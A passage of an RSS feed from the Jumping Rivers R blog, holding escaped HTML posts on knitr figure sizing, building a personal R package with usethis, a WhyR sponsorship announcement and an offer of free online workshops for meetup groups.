&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;knitr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;opts_chunk&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;set&lt;/span&gt;(fig.retina &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Whether you set it to 1 or 2 doesn&amp;rsquo;t affect the values you set for &lt;code&gt;dpi&lt;/code&gt; and &lt;code&gt;fig.&lt;/code&gt;
What it &lt;strong&gt;does&lt;/strong&gt; affect is the size of the generated image. If you don&amp;rsquo;t believe me,
create two images and examine the dimensions with the &lt;code&gt;png::readPNG()&lt;/code&gt; function.&lt;/p&gt;
&lt;h2 id="but-what-about-figasp"&gt;But what about fig.asp?&lt;/h2&gt;
&lt;p&gt;The chunk argument &lt;code&gt;fig.asp&lt;/code&gt; controls the aspect ratio of the plot. For example,
setting &lt;code&gt;fig.width = fig.height&lt;/code&gt; would give an aspect ratio of 1. Consequently,
you would only ever define &lt;strong&gt;two&lt;/strong&gt; of &lt;code&gt;fig.width&lt;/code&gt;, &lt;code&gt;fig.height&lt;/code&gt; and &lt;code&gt;fig.asp&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Typically I set &lt;code&gt;fig.asp = 0.7&lt;/code&gt; in the {knitr} header, ignore &lt;code&gt;fig.height&lt;/code&gt; and specify
the &lt;code&gt;fig.width&lt;/code&gt; in each chunk as needed.&lt;/p&gt;
&lt;h2 id="is-that-all"&gt;Is that all?&lt;/h2&gt;
&lt;p&gt;Unfortunately not. The following three graphics have
all been using exactly the same {knitr} chunk options&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;fig.width = 400/72&lt;/code&gt; and &lt;code&gt;fig.height = 400/72&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This has been our running {ggplot2} example&lt;/p&gt;
&lt;img src="cache-graphics/image-sizes-b1-1.png" width="533.333333333333" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;p&gt;This is changing the theme via &lt;code&gt;hrbrthemes::theme_ipsum()&lt;/code&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;g &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; hrbrthemes&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme_ipsum&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="cache-graphics/image-sizes-b2-1.png" width="533.333333333333" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;p&gt;and this is standard base graphics&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;plot&lt;/span&gt;(dd&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;x, dd&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;y)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="cache-graphics/image-sizes-b3-1.png" width="533.333333333333" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;p&gt;Notice that the latter two plots have a larger white space border around them.
You could use a tool to automatically crop the white space, but that changes the dimensions of the image. Instead, you should use some R code to remove the surrounding white space.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/knitr-rmarkdown-image-size/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Writing a Personal R Package</title><link>https://www.jumpingrivers.com/blog/personal-r-package/</link><pubDate>Sun, 07 Feb 2021 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/personal-r-package/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/personal-r-package/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/personal-r-package/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;If you&amp;rsquo;ve been using R for a while, you&amp;rsquo;ve likely accumulated a hodgepodge of useful code along the way. Said hodgepodge might include functions you source into multiple projects; bits and bobs that you copy and paste where needed; or code that solved a particularly esoteric problem and will never be applicable elsewhere, but you still enjoy revisiting sometimes. We all do it.&lt;/p&gt;
&lt;p&gt;If you&amp;rsquo;re anything like me, your personal library of code has grown gradually and haphazardly. It&amp;rsquo;s spread across multiple locations, wherever was easiest at the time: a directory on a laptop; a pen drive; line 243 of the script in which it was originally conceived. It&amp;rsquo;s entirely untested, poorly documented and takes a while to decipher every time you return to it. You&amp;rsquo;re proud of some of it, and ashamed at the mess of the rest of it. If you&amp;rsquo;re nodding along so far, this blogpost is for you.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2021-personal-r-package"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h1 id="a-better-way"&gt;A better way&lt;/h1&gt;
&lt;p&gt;&lt;a href="https://r-pkgs.org/" rel="external"&gt;Writing an R package&lt;/a&gt; can seem daunting at first. If you&amp;rsquo;ve browsed the source code of a popular &lt;a href="https://cran.r-project.org/" rel="external"&gt;CRAN&lt;/a&gt; package then you can be forgiven for feeling overwhelmed. But a package doesn&amp;rsquo;t need to be the next &lt;a href="https://rdatatable.gitlab.io/data.table/" rel="external"&gt;data.table&lt;/a&gt; or have the audience of &lt;a href="https://dplyr.tidyverse.org/" rel="external"&gt;dplyr&lt;/a&gt; to be worthwhile. And thanks to the wonderful &lt;a href="https://usethis.r-lib.org/" rel="external"&gt;usethis&lt;/a&gt; package, creating a personal R package could scarcely be easier.&lt;/p&gt;
&lt;p&gt;Plenty of prominent statisticians and data scientists have personal R packages in which they store their miscellaneous functions: &lt;a href="https://github.com/kbroman/broman" rel="external"&gt;Karl Broman&lt;/a&gt;; &lt;a href="https://yihui.org/xfun/" rel="external"&gt;Yihui Xie&lt;/a&gt;; and &lt;a href="https://github.com/dgrtwo/drlib" rel="external"&gt;David Robinson&lt;/a&gt;, to name a few. But nobodies can do the same: &lt;a href="https://github.com/jackhannah95/jafun" rel="external"&gt;I now have one&lt;/a&gt;. The primary audience for a personal R package is yourself, and it doesn&amp;rsquo;t matter if no else uses or cares about it.&lt;/p&gt;
&lt;h1 id="why-bother"&gt;Why bother?&lt;/h1&gt;
&lt;p&gt;I first created my personal R package because I had the following function saved in a directory called &amp;ldquo;useful-code&amp;rdquo;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## See discussion below for an improved version&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;days_of_week &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(abbr &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; days &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;weekdays&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;as.Date&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;seq&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;7&lt;/span&gt;), origin &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;1950-01-01&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; (&lt;span style="color:#d2a8ff;font-weight:bold"&gt;isFALSE&lt;/span&gt;(abbr)) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt;(days)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; } &lt;span style="color:#ff7b72"&gt;else&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;substr&lt;/span&gt;(days, &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;At the time I was working on a project that required aggregating data by day of the week. I was tired of typing out &amp;ldquo;Monday, Tuesday, Wednesday, &amp;hellip;&amp;rdquo; by hand every time, so I &amp;ldquo;borrowed&amp;rdquo; &lt;a href="https://stackoverflow.com/questions/16193549/how-can-i-create-a-vector-containing-the-days-of-the-week/16193697#16193697" rel="external"&gt;the best code I could find on the topic from Stack Overflow&lt;/a&gt; and turned it into a function that did nothing other than return a vector of the days of the week in the formats I required:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;days_of_week&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [1] &amp;#34;Monday&amp;#34; &amp;#34;Tuesday&amp;#34; &amp;#34;Wednesday&amp;#34; &amp;#34;Thursday&amp;#34; &amp;#34;Friday&amp;#34; &amp;#34;Saturday&amp;#34; &amp;#34;Sunday&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;days_of_week&lt;/span&gt;(abbr &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [1] &amp;#34;Mon&amp;#34; &amp;#34;Tue&amp;#34; &amp;#34;Wed&amp;#34; &amp;#34;Thu&amp;#34; &amp;#34;Fri&amp;#34; &amp;#34;Sat&amp;#34; &amp;#34;Sun&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Every time I wanted to use &lt;code&gt;days_of_week()&lt;/code&gt; in a new project (it was more often than you might think), I copied it from my &amp;ldquo;useful-code&amp;rdquo; directory, pasted it into a &amp;ldquo;functions&amp;rdquo; sub-directory within my project, and used &lt;code&gt;source()&lt;/code&gt; to load it into the relevant script(s). It was laborious and unsustainable; I periodically made (and make) changes to the function but, inevitably, I could never remember all the places I&amp;rsquo;d used it. I ended up using different versions of the same function across multiple projects, which is risky territory to be in even for a function as basic as this one. After reading &lt;a href="https://hilaryparker.com/2013/04/03/personal-r-packages/" rel="external"&gt;Hilary Parker&amp;rsquo;s blogpost on personal R packages&lt;/a&gt;, I decided to give it a try.&lt;/p&gt;
&lt;h1 id="how-to-do-it"&gt;How to do it&lt;/h1&gt;
&lt;p&gt;The aforementioned &lt;a href="https://usethis.r-lib.org/" rel="external"&gt;usethis&lt;/a&gt; package takes care of the setup grunt work:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;path &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;file.path&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;tempdir&lt;/span&gt;(), &lt;span style="color:#a5d6ff"&gt;&amp;#34;jafun&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;usethis&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;create_package&lt;/span&gt;(path)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; ✓ Creating &amp;#39;/data/ncsg3/R_tmp/RtmpKbRqBJ/jafun/&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; ✓ Setting active project to &amp;#39;/data/ncsg3/R_tmp/RtmpKbRqBJ/jafun&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; ✓ Creating &amp;#39;R/&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; ✓ Writing &amp;#39;DESCRIPTION&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; Package: jafun&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; Title: What the Package Does (One Line, Title Case)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; Version: 0.0.0.9000&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; Authors@R (parsed):&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; * First Last &amp;lt;first.last@example.com&amp;gt; [aut, cre] (YOUR-ORCID-ID)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; Description: What the package does (one paragraph).&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; License: `use_mit_license()`, `use_gpl3_license()` or friends to pick a&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; license&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; Encoding: UTF-8&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; Roxygen: list(markdown = TRUE)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; RoxygenNote: 7.1.2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; ✓ Writing &amp;#39;NAMESPACE&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; ✓ Setting active project to &amp;#39;&amp;lt;no active project&amp;gt;&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Move your function(s) into the &lt;a href="https://r-pkgs.org/r.html" rel="external"&gt;&amp;ldquo;R&amp;rdquo; directory&lt;/a&gt;, add some &lt;a href="https://r-pkgs.org/man.html" rel="external"&gt;documentation&lt;/a&gt;, build the package with Ctrl + Shift + B, and voila:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;jafun&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;days_of_week&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;jafun&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;days_of_week&lt;/span&gt;(abbr &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h1 id="next-steps"&gt;Next steps&lt;/h1&gt;
&lt;p&gt;Once you&amp;rsquo;ve developed the basis of your personal R package, you can spruce it up with as many or as few additional features as you&amp;rsquo;d like to. Adding your name and some basic details about the package to the &lt;a href="https://r-pkgs.org/description.html" rel="external"&gt;Description file&lt;/a&gt; is helpful. &lt;a href="https://r-pkgs.org/tests.html" rel="external"&gt;Unit testing&lt;/a&gt;, &lt;a href="https://r-pkgs.org/release.html" rel="external"&gt;releases&lt;/a&gt; and &lt;a href="https://r-pkgs.org/r-cmd-check.html" rel="external"&gt;automated checking&lt;/a&gt; are present in most packages. Putting your package on &lt;a href="https://github.com/" rel="external"&gt;GitHub&lt;/a&gt; allows you (and others) to install your package remotely using &lt;code&gt;remotes::install_github()&lt;/code&gt; without requiring a local copy of the source code. None of that is compulsory though. Your package only has to be as detailed as you want it to be.&lt;/p&gt;
&lt;p&gt;Your package will, inevitably, evolve over time. You&amp;rsquo;ll add new functions and improve upon existing ones. By way of example, a more efficient implementation of the aforementioned &lt;code&gt;days_of_week()&lt;/code&gt; would be:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;days_of_week &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(abbreviate &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dates &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;as.Date&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;7&lt;/span&gt;, origin &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;1950-01-01&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;weekdays&lt;/span&gt;(dates, abbreviate &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; abbreviate)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This would negate the need for an &lt;code&gt;if&lt;/code&gt; statement, and it would &lt;a href="https://github.com/jackhannah95/jafun/issues/3" rel="external"&gt;fix a bug&lt;/a&gt; in the existing version. There are undoubtedly plenty of implementations more efficient than my original one. But I wrote &lt;code&gt;days_of_week()&lt;/code&gt; for myself, with the skills I had at the time, and it did what I needed it to do. Any package maintainer would stress the importance of refining your code over time, but it doesn&amp;rsquo;t need to be at its optimum from the outset to be worth going in a package.&lt;/p&gt;
&lt;p&gt;The longer you use R, the more miscellaneous code you&amp;rsquo;ll amass. And the more you amass, the harder it&amp;rsquo;ll be to keep track of. Creating a personal R package provides a sustainable and pain-free method of storing, growing and re-using your unique library of code. It might even provide a safe incubator to learn the ropes of package development prior to making open source contributions elsewhere. But at the very least, it&amp;rsquo;ll stop you from dipping into that &amp;ldquo;useful-functions&amp;rdquo; directory every time you want a vector of the days of the week.&lt;/p&gt;
&lt;h1 id="notes-and-thanks"&gt;Notes and thanks&lt;/h1&gt;
&lt;p&gt;Most of the links in this blogpost are from the &lt;a href="https://r-pkgs.org/index.html" rel="external"&gt;R Packages&lt;/a&gt; book by &lt;a href="http://hadley.nz/" rel="external"&gt;Hadley Wickham&lt;/a&gt; and &lt;a href="https://jennybryan.org/" rel="external"&gt;Jenny Bryan&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/personal-r-package/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Jumping Rivers and WhyR partnership</title><link>https://www.jumpingrivers.com/blog/why-r-partnership/</link><pubDate>Wed, 25 Nov 2020 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/why-r-partnership/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/why-r-partnership/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/why-r-partnership/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;We love supporting the community around the open source tools that we use on a daily basis. In the past, &lt;a href="https://www.jumpingrivers.com/" rel="external"&gt;Jumping Rivers&lt;/a&gt; has helped useR user groups and SatRdays events to happen by enabling &lt;a href="https://www.jumpingrivers.com/blog/sponsorship-satrdays-and-user-groups/" rel="external"&gt;frictionless sponsorship for European groups&lt;/a&gt;. We believe that it is our duty to help grow the community that helps us. With that in mind, it is our honour to announce that we are proudly sponsoring a new season of events hosted by &lt;a href="http://whyr.pl/foundation/about/" rel="external"&gt;WhyR&lt;/a&gt;.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2020-why-r-partnership"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;p&gt;WhyR is a team of R enthusiasts coming from both business and academia who aim to support local R communities around the world. The foundation organises events focusing on the worldwide use of R statistical software such as conferences, hackathons and webinars. The initiative is well known by their remarkable commitment to knowledge and diversion for the &lt;a href="https://www.r-project.org/" rel="external"&gt;R programming language&lt;/a&gt; and open source sphere.&lt;/p&gt;
&lt;p&gt;Their main goals are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;spreading knowledge about the R statistical package,&lt;/li&gt;
&lt;li&gt;supporting programs and pro-development initiatives in the fields of economics, mathematics, statistics and data science to serve educational activities,&lt;/li&gt;
&lt;li&gt;supporting cooperation between the scientific and business environment.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We find those align well with the Jumping Rivers mission and are delighted to work beside such an honourable organisation.&lt;/p&gt;
&lt;p&gt;Stay tuned on our &lt;a href="https://twitter.com/jumping_uk" rel="external"&gt;Twitter&lt;/a&gt; and &lt;a href="https://www.linkedin.com/company/jumping-rivers-ltd/" rel="external"&gt;LinkedIn&lt;/a&gt; to hear more about the events.&lt;/p&gt;
&lt;p&gt;All webinars will be streamed at &lt;a href="https://www.youtube.com/c/WhyRFoundationVideos" rel="external"&gt;WhyR&amp;rsquo;s Youtube&lt;/a&gt; page.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/why-r-partnership/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Free Workshops for Meetup Groups</title><link>https://www.jumpingrivers.com/blog/free-workshops-for-meetup-groups/</link><pubDate>Fri, 16 Oct 2020 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/free-workshops-for-meetup-groups/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/free-workshops-for-meetup-groups/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/free-workshops-for-meetup-groups/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;For the last few years we’ve offered &lt;a href="https://www.jumpingrivers.com/blog/sponsorship-satrdays-and-user-groups/" rel="external" title="automatic sponsorship"&gt;automatic sponsorship&lt;/a&gt; for meet-ups and satRday events. However for obvious COVID related reasons, most (all?) meet-ups have meeting getting together virtually, so the need for extra Pizza money has diminished.&lt;/p&gt;
&lt;p&gt;As with most organisations, we’ve had to adapted to the new online-first environment. In particular, running primarily &lt;a href="https://www.jumpingrivers.com/blog/online-r-python-git-training/" rel="external" title="online training courses"&gt;online training courses&lt;/a&gt;. We’ve always ran &lt;em&gt;some&lt;/em&gt;, online events, but now we’re running in excess of ten days of training per month on topics ranging from R, Python, Git, Shiny and Stan. So far our average course rating is a healthy 4.7 out of 5!&lt;/p&gt;
&lt;p&gt;With this new found experience in online training, and our regret at not getting to interact with useR groups from around the world, we thought that one way we could contribute back to the community would be to offer free training workshops.&lt;/p&gt;
&lt;p&gt;Potential topics fall into two groups. Introductory sessions, where the background would be kept to a minimum, e.g.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;starting out with the tidyverse&lt;/li&gt;
&lt;li&gt;Rmarkdown&lt;/li&gt;
&lt;li&gt;basic git&lt;/li&gt;
&lt;li&gt;building an R package&lt;/li&gt;
&lt;li&gt;regular expressions&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Or more advanced topics that would require some pre-requisites&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;getting started with Shiny&lt;/li&gt;
&lt;li&gt;continuous integration&lt;/li&gt;
&lt;li&gt;advanced git topics, e.g. rebase vs merge&lt;/li&gt;
&lt;li&gt;anything else?&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If you are interested, then please complete this short &lt;a href="https://www.jumpingrivers.com/q/sponsorship/" rel="external"&gt;form&lt;/a&gt; and we’ll get in touch.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/free-workshops-for-meetup-groups/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>The (Delayed) 2019 Training Review</title><link>https://www.jumpingrivers.com/blog/the-delayed-2019-training-review/</link><pubDate>Tue, 13 Oct 2020 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/the-delayed-2019-training-review/</guid><description>
&lt;p&gt;
